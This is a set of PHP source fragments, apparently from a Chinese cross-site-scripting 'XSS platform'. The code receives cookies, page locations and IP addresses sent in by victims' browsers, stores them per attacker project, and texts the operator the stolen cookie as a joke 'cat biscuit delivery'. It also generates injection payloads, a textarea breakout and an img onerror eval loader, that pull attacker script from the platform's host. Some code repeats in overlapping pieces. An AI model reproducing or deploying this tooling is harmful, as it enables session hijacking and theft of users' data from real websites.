} } } /* 模块 end */ foreach ($keys as $key) { $content[$key] = Val($key, 'REQUEST'); } if (in_array('toplocation', $keys)) { $content['toplocation'] = !empty($content['toplocation']) ? $content['toplocation'] : $content['location']; } $judgeCookie = in_array('cookie', $keys) ? true : false; /* cookie hash */ $cookieHash = md5($project['id'] . '_' . $content['cookie'] . '_' . $content['location'] . '_' . $content['toplocation']); $cookieExisted = $db->FirstValue("SELECT COUNT(*) FROM " . Tb('project_content') . " WHERE projectId='{$project[id]}' AND cookieHash='{$cookieHash}'"); if (!$judgeCookie || $cookieExisted <= 0) { //服务器获取的content $serverContent = array(); $serverContent['HTTP_REFERER'] = $_SERVER['HTTP_REFERER']; $referers = @parse_url($serverContent['HTTP_REFERER']); $domain = $referers['host'] ? $referers['host'] : ''; $domain = StripStr($domain); $serverContent['HTTP_REFERER'] = StripStr($_SERVER['HTTP_REFERER']); $serverContent['HTTP_USER_AGENT'] = StripStr($_SERVER['HTTP_USER_AGENT']); $serverContent['REMOTE_ADDR'] = StripStr($_SERVER['HTTP_X_FORWARDED_FOR']); $values = array('projectId' => $project['id'], 'content' => JsonEncode($content), 'serverContent' => JsonEncode($serverContent), 'domain' => $domain, 'cookieHash' => $cookieHash, 'num' => 1, 'addTime' => time()); $db->AutoExecute(Tb('project_content'), $values); } else { $db->Execute("UPDATE " . Tb('project_content') . " SET num=num+1,updateTime='" . time() . "' WHERE projectId='{$project[id]}' AND cookieHash='{$cookieHash}'"); } header("Location: {$_SERVER['HTTP_REFERER']} "); }
$setkeys = json_decode($module['setkeys'], true); foreach ($setkeys as $setkey) { $module['code'] = str_replace('{set.' . $setkey . '}', $moduleSetKeys["setkey_{$module[id]}_{$setkey}"], $module['code']); } } $code .= $module['code']; } } } /* 模块 end */ /* 项目自定义代码 */ $codeurl = URL_ROOT . "/{$project[urlKey]}?" . time(); $code .= $project['code']; $scriptShow1 = StripStr("</textarea>'\"><script src=" . URL_ROOT . "/{$project[urlKey]}?" . time() . "></script>"); $code2 = 'var b=document.createElement("script");b.src="' . URL_ROOT . "/{$project[urlKey]}?" . '"+Math.random();(document.getElementsByTagName("HEAD")[0]||document.body).appendChild(b);'; $scriptShow2 = StripStr("</textarea>'\"><img src=# id=xssyou style=display:none onerror=eval(unescape(/" . rawurlencode($code2) . "/.source));//>"); include 'common.php'; $smarty = InitSmarty(); $smarty->assign('do', $do); $smarty->assign('show', $show); $smarty->assign('url', $url); $smarty->assign('project', $project); $smarty->assign('code', $code); $smarty->assign('codeurl', $codeurl); $smarty->assign('scriptShow1', $scriptShow1); $smarty->assign('scriptShow2', $scriptShow2); $smarty->assign('projects', $projects); $smarty->assign('modules', $modules); $smarty->assign('ty', $ty); $smarty->display('project_viewcode.html'); break;
/** Val 获得提交的值 @param $name string 参数名 @param $method string 获取途径(GET/POST/COOKIE/REQUEST) @param $type string/int 过滤类型('string'/0=>string,'int'/1=>int,其它/2=>不过滤) @param $isArray int 0=>非数组,1=>数组 @return $value string/int */ function Val($name, $method = 'GET', $type = 0, $isArray = 0) { if ($name == '' || !is_string($name)) { return ''; } $method = strtoupper($method); switch ($method) { case 'GET': $value = $_GET[$name]; break; case 'POST': $value = $_POST[$name]; break; case 'COOKIE': $value = $_COOKIE[$name]; break; case 'REQUEST': $value = $_REQUEST[$name]; break; case 'SERVER': $value = $_SERVER[$name]; break; default: break; } $isArray = intval($isArray); switch ($type) { case 0: case 'string': $value = $isArray == 0 ? StripStr($value) : array_map('StripStr', (array) $value); break; case 1: case 'int': $value = $isArray == 0 ? intval($value) : array_map('intval', (array) $value); break; case 2: default: break; } return $value; }
$cookieHash = md5($project['id'] . '_' . $content['cookie'] . '_' . $content['location'] . '_' . $content['toplocation']); $cookieExisted = $db->FirstValue("SELECT COUNT(*) FROM " . Tb('project_content') . " WHERE projectId='{$project[id]}' AND cookieHash='{$cookieHash}'"); if (!$judgeCookie || $cookieExisted <= 0) { //服务器获取的content $serverContent = array(); $serverContent['HTTP_REFERER'] = $_SERVER['HTTP_REFERER']; $referers = @parse_url($serverContent['HTTP_REFERER']); $domain = $referers['host'] ? $referers['host'] : ''; $domain = StripStr($domain); $serverContent['HTTP_REFERER'] = StripStr($_SERVER['HTTP_REFERER']); $serverContent['HTTP_USER_AGENT'] = StripStr($_SERVER['HTTP_USER_AGENT']); $user_ip = $_SERVER['HTTP_X_FORWARDED_FOR']; if ($user_ip == '') { $user_ip = $_SERVER['REMOTE_ADDR']; } $serverContent['REMOTE_ADDR'] = StripStr($user_ip); $values = array('projectId' => $project['id'], 'content' => JsonEncode($content), 'serverContent' => JsonEncode($serverContent), 'domain' => $domain, 'cookieHash' => $cookieHash, 'num' => 1, 'addTime' => time()); //$db->AutoExecute(Tb('project_content'),$values); $judgeCookie = in_array('cookie', $keys) ? true : false; /* cookie hash */ $Getcookie = $content['cookie']; $db->AutoExecute(Tb('project_content'), $values); //Getcookie在上面的变量里 $uid = $project['userId']; $userInfo = $db->FirstRow("SELECT * FROM " . Tb('user') . " WHERE id={$uid}"); $msg = explode("|", $userInfo['message']); if ($userInfo['phone'] && $msg[1] == 1) { SendSMS('13800138000', '123456', $userInfo['phone'], "尊敬的" . $userInfo['userName'] . ",您在" . URL_ROOT . " 预订的猫饼干,Cookie:{$Getcookie}已经到货!详情请登陆:" . URL_ROOT . " 查看!"); //参数:发送的飞信号 飞信密码 } if ($userInfo['email'] && $msg[0] == 1) {